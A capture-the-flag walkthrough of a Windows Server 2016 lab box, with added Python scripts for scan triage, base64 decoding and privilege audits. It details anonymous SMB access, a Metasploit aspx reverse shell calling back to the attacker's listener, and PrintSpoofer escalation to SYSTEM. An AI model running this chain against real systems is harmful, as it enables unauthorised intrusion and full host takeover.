First, we will begin with our usual nmap scan to see where we can start looking.
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-22 04:18 CET
Nmap scan report for 10.10.218.69
Host is up (0.093s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server?
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-12-21T03:13:52
|_Not valid after: 2022-06-22T03:13:52
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2021-12-22T03:20:37+00:00
|_ssl-date: 2021-12-22T03:21:15+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h36m00s, deviation: 3h34m42s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2021-12-22T03:20:37
|_ start_date: 2021-12-22T03:14:38
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT
| Workgroup: WORKGROUP
|_ System time: 2021-12-21T19:20:39-08:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.73 seconds
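The security-relevant points in the scan above can be pulled out programmatically. This is an added example and not part of the write-up: the embedded report is a trimmed copy of the nmap output shown above, and the finding identifiers, regexes and remediation text are the example's own choices.

```python
"""Triage an nmap -sC -sV text report for SMB/HTTP/RDP hardening findings.

Added example (not the write-up's own code). SCAN is a trimmed copy of the
report in the write-up, embedded so the script runs offline.
"""
import re

# Trimmed copy of the nmap output from the write-up (sample input).
SCAN = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ms-wbt-server?
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
"""

# Each check: (finding id, regex over the report, remediation). The ids and
# the remediation wording are this example's own.
CHECKS = [
    ("smb-signing-not-required",
     r"Message signing enabled but not required|message_signing: disabled",
     "Require SMB signing: 'Microsoft network server: Digitally sign communications (always)'."),
    ("smb-guest-access",
     r"account_used: guest",
     "Disable the Guest account and restrict anonymous share enumeration."),
    ("http-trace-enabled",
     r"Potentially risky methods:.*\bTRACE\b",
     "Deny the TRACE verb in IIS request filtering."),
    ("rdp-exposed",
     r"^3389/tcp\s+open",
     "Do not expose RDP directly; require NLA and put it behind a VPN or gateway."),
]


def open_ports(report: str) -> list[int]:
    """Return the open TCP ports listed in the report, in report order."""
    return [int(m.group(1)) for m in re.finditer(r"^(\d+)/tcp\s+open", report, re.M)]


def triage(report: str) -> list[dict]:
    """Return one finding dict per check whose pattern matches the report."""
    findings = []
    for fid, pattern, remediation in CHECKS:
        m = re.search(pattern, report, re.M)
        if m:
            findings.append({"id": fid, "evidence": m.group(0).strip(), "fix": remediation})
    return findings


if __name__ == "__main__":
    print("open ports:", open_ports(SCAN))
    for f in triage(SCAN):
        print(f"[{f['id']}] {f['evidence']}\n    -> {f['fix']}")
```

The same four checks apply to any nmap text report saved with `-oN`; the regexes key on the script output lines, not on the host or port layout, so the column spacing nmap uses does not matter.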
From this we see the web server is Microsoft IIS 10.0 on Windows Server 2016, not too bad.
Another important thing: SMB is also exposed, and nmap was able to run its checks with the guest account, with message signing not required. Listing the shares works without credentials, and there's also an interesting share, nt4wrksv.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
Now we just have to connect to it and see what's happening.
Password for [WORKGROUP\max]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 25 23:46:04 2020
.. D 0 Sat Jul 25 23:46:04 2020
passwords.txt A 98 Sat Jul 25 17:15:33 2020
7735807 blocks of size 4096. 4945463 blocks available
smb: \> cat passwords.txt
cat: command not found
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Looks like we are lucky: we got an encoded passwords text file, so let's see what's in it.
User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
Now that we have the encoded passwords, we need to decode them (they are plain base64, not encrypted). For that I used this website.
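The decoding step in code, so it works offline on a whole file rather than one string at a time. This is an added example, not the write-up's own code or the website it used; the sample lines are constructed in the same "Name - password" base64 format as the file on the share, and a header line and a corrupt line are included to show what a parser has to skip. The defender's point is the same as the write-up's: base64 is an encoding, so anyone who can read the share has the plaintext.

```python
"""Decode a 'User Passwords - Encoded' file of base64 'Name - password' lines.

Added example (not the write-up's own code). SAMPLE is constructed, not the
file from the box; the format is the same.
"""
import base64
import binascii
from typing import Optional

# Constructed sample file: a header, two valid entries and a corrupt entry.
SAMPLE = """\
User Passwords - Encoded
QWxpY2UgLSBleGFtcGxlLXBhc3MtMQ==
Q2Fyb2wgLSBzM2NyZXQhPw==
not*base64*at*all
"""


def decode_entry(line: str) -> Optional[tuple[str, str]]:
    """Decode one base64 line into (user, password); None if it is not one."""
    try:
        # validate=True rejects non-alphabet characters (the header, junk)
        # instead of silently discarding them.
        raw = base64.b64decode(line.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    user, sep, password = raw.partition(" - ")
    if not sep:
        return None  # decoded fine, but not in the 'Name - password' shape
    return user.strip(), password


def decode_file(text: str) -> dict[str, str]:
    """Decode every valid entry in the file; header and junk lines are skipped."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        entry = decode_entry(line)
        if entry:
            creds[entry[0]] = entry[1]
    return creds


if __name__ == "__main__":
    for user, password in decode_file(SAMPLE).items():
        print(f"{user}: {password}")
```

Run it against the real file with `decode_file(open("passwords.txt").read())`; the header line on the share is rejected by `validate=True` in the same way as the constructed header here.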
After decoding both, we are left with 2 users:
Scanning a little more, I didn't find anywhere to use these credentials, so I started digging a bit.
After another nmap scan, this time with the -p- flag, we find another HTTP port, 49663, serving a directory with the same name as the share (nt4wrksv). Since whatever we write to the share ends up served by IIS, we can upload a reverse shell and invoke it by browsing to it. So first, let's generate the reverse-shell payload.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of aspx file: 1010404 bytes
Saved as: 1337.aspx
Perfect. Before uploading that to the SMB share, we need to start a listener with Metasploit.
=[ metasploit v6.1.8-dev ]
+ -- --=[ 2167 exploits - 1149 auxiliary - 397 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.8.208.63
LHOST => 10.8.208.63
msf6 exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.208.63:1337
Now we can finally connect to the share, upload our payload and get a Meterpreter reverse shell by navigating to the page.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.8.208.63:1337
[*] Meterpreter session 7 opened (10.8.208.63:1337 -> 10.10.232.253:49773) at 2021-12-22 05:24:46 +0100
meterpreter > whoami /priv
[-] Unknown command: whoami
meterpreter > shell
Process 2284 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
Looks like we are finally inside the server. Now go grab the user flag at C:\Users\Bob\Desktop\user.txt and let's move on to getting root.
So we are now inside the server as the user iis apppool\defaultapppool.
Taking a closer look at the privileges we have, SeImpersonatePrivilege stands out: it lets the process impersonate clients that authenticate to it, and there's a well-known exploit called PrintSpoofer that abuses that privilege to escalate to SYSTEM.
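The same privilege review, written as a check a defender can run over `whoami /priv` output from service accounts and app pool identities. This is an added example, not the write-up's code: the embedded table is the output the shell showed above, and the set of privileges it flags is the example's own choice. Note that a privilege listed as Disabled is still held by the token and can be enabled by the process, so the audit reports held privileges, not only enabled ones. IIS app pool identities hold SeImpersonatePrivilege by default, so the practical mitigations are keeping the host patched and disabling the Print Spooler service on servers that do not need it, since that is the service PrintSpoofer talks to.

```python
"""Audit `whoami /priv` output for impersonation-class privileges.

Added example (not the write-up's own code). WHOAMI_PRIV is the table the
shell printed on the box; HIGH_RISK is this example's own list.
"""
import re

# Output of `whoami /priv` as shown in the write-up.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a process run code as another account's token.
# Windows grants both to IIS app pool identities and service accounts by
# default, which is why a web-shell context is usually one step from SYSTEM.
HIGH_RISK = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
}

# One table row: name, free-text description, state.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privs(text: str) -> dict[str, bool]:
    """Map each privilege name to True if Enabled, False if Disabled."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3) == "Enabled"
    return privs


def risky_privs(text: str) -> list[str]:
    """High-risk privileges the token holds, whether enabled or disabled."""
    return sorted(p for p in parse_privs(text) if p in HIGH_RISK)


def verdict(text: str) -> str:
    """One-line summary suitable for a hardening report."""
    risky = risky_privs(text)
    if not risky:
        return "no impersonation-class privileges held"
    return "token can impersonate clients: " + ", ".join(risky)


if __name__ == "__main__":
    for name, enabled in parse_privs(WHOAMI_PRIV).items():
        flag = "  <-- high risk" if name in HIGH_RISK else ""
        print(f"{name:32} {'Enabled' if enabled else 'Disabled'}{flag}")
    print(verdict(WHOAMI_PRIV))
```

Feed it the output of `whoami /priv` captured from each service account you care about; anything that reports a verdict other than "no impersonation-class privileges held" is a context where a code-execution bug becomes a SYSTEM compromise.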
First, let's get the exe from here and upload it to the SMB share again.
After that, we just navigate to the share directory inside our reverse shell and execute the file.
PrintSpoofer.exe -i -c powershell.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
Well, looks like that's it. Just go and grab the flag at C:\Users\Administrator\Desktop\root.txt.
Hope you enjoyed it!